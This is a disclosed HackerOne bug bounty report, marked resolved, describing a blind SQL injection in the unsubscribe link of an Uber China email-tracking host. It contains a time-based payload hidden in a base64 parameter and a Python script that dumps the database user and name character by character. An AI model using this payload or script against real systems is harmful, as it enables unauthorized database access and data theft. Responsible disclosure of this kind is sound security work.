SQL Injection on sctrack.email.uber.com.cn

Disclosed: 2016-07-25 16:29:55 By orange To uber
Unknown
Vulnerability Details
Hi, Uber Security team I just traveled to China, when I call Uber in China. I received an advertisement mail from Uber and I found the unsubscribe link is different from the original unsubscribe link, and there is a SQL Injection under the unsubscribe link. You can see where to find the unsubscribe link from the attachments. The parameter of user_id is suffered from SQL Injection. Payload ``` http://sctrack.email.uber.com.cn/track/unsubscribe.do?p=eyJ1c2VyX2lkIjogIjU3NTUgYW5kIHNsZWVwKDEyKT0xIiwgInJlY2VpdmVyIjogIm9yYW5nZUBteW1haWwifQ== ``` You can see the server sleep 12 seconds. I write a script to dump the database name and user name. ``` import json import string import requests from urllib import quote from base64 import b64encode base = string.digits + '_-@.' payload = {"user_id": 5755, "receiver": "blog.orange.tw"} for l in range(0, 30): for i in 'i'+base: payload['user_id'] = "5755 and mid(user(),%d,1)='%c'#"%(l+1, i) new_payload = json.dumps(payload) new_payload = b64encode(new_payload) r = requests.get('http://sctrack.email.uber.com.cn/track/unsubscribe.do?p='+quote(new_payload)) if len(r.content)>0: print i, break ``` The username of mysql user is `[email protected]` The database name is `sendcloud`
Actions
View on HackerOne
Report Stats
  • Report ID: 150156
  • State: Closed
  • Substate: resolved
  • Upvotes: 85
Share this report